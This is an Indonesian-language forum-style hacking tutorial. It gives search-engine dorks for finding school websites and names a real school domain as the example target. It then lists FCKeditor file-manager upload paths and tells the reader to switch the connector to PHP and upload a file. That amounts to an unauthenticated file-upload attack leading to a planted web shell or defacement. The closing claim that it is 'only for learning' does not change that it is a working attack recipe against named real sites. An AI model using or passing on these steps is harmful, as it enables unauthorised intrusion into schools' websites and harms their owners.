Langkah pertama : Kita cari saja memakai dork di search engine, kayak google atau yahoo dan lain lain
Dengan memakai dork dibawah ini :
Code:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
nah udah dapet situs yang jadi target, kalau sekarang kita pakai situs http://www.smk1jepara.net.
klo udah dapet situs yang diincer ente tambahin aja situs/web yg diincer pake exploit di bawah ini
Exploit :
http://target/editor/filemanager/connectors/uploadtest.html
http://target/editor/filemanager/connectors/test.html
http://target/editor/filemanager/browser/default/browser.html
pilih salah satu aja…contoh :
Code:
http://www.smk1jepara.net/editor/filemanager/connectors/uploadtest.html
lalu pilih connector nya dari ASP –> PHP,,tinggal masukin filenya agan deh...
NB : Jangan disalah gunakan tutor ini, hanya untuk pembelajaran saja